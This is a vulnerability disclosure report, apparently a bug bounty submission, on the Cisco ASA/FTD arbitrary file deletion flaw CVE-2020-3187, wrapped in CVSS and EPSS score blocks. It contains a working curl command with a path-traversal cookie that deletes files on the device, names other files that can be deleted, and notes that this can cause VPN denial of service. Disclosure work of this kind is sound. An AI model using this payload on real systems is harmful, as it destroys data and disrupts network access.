9.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.974 High
EPSS
Percentile
99.9%
Hi @U.S. Dept Of Defense, I found a host <https://██████> which is running on the web services interface of Cisco ASA/FTD and it is vulnerable to CVE-2020-3187 - Unauthenticated arbitrary file deletion in Cisco ASA/FTD. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences. An exploit could allow the attacker to view or delete arbitrary files on the targeted system. When the device is reloaded after the exploitation of this vulnerability, any files that were deleted are restored. The attacker can only view and delete files within the web services file system.
Proof of Concept:
Now we know that in CVE-2020-3187 - Unauthenticated arbitrary file deletion in Cisco ASA/FTD. This allow the attacker to view or delete arbitrary files on the targeted system
In this we can delete the files. For example the logo file present on the server at <https://████████/+CSCOU+/csco_logo.gif> can be deleted by the following steps.
This can be done by sending a curl request as : curl -H “Cookie: token=…/+CSCOU+/csco_logo.gif” <https://███/+CSCOE+/session_password.html>
To delete this just hit the following command on your terminals.
curl -H “Cookie: token=../+CSCOU+/csco_logo.gif” https://█████████/+CSCOE+/session_password.html
If that did not work because sometimes logo.gif/png has permission issues so try this <https://█████/+CSCOE+/blank.html>
You can also delete the file “/+CSCOE+/blank.html
” (an empty HTML file), as it might be a problem with the permission of the custom logo file sometimes logo.gif has permission issue so we might not be able to delete but we can delete other files
Warning : This can lead to a denial of service (DOS) on the VPN by deleting the lua source code files from the file system, which will break the WebVPN interface until the device is rebooted.
Now i haven’t deleted the logo file because i didn’t wanted to cause any damage so i used another method which can help us confirming that target is vulnerable to this without causing damage and for that just check if /+CSCOE+/session_password.html
endpoint exists, and it gives “200 OK” status, then it should be vulnerable because this affected endpoint has been removed from the patched versions.
I sent a curl request to check and it gave 200 ok as shown below:
/+CSCOE+/session_password.html -> 200 = Vulnerable
/+CSCOE+/session_password.html -> 404 = Patched
Mitigation/Remediation Actions:
Upgrade the ASA software version per the referenced advisory. This advisory is available at the following link:
<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43>
Reference:
<https://twitter.com/aboul3la/status/1286809567989575685>
<https://medium.com/@parasarora06/hunting-for-cve-2020-3187-2020-3452-9f0dcc66f4d8>
<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43>
<http://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html>
High - This vulnerability allows the attacker to delete files within the web services file system.
9.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.974 High
EPSS
Percentile
99.9%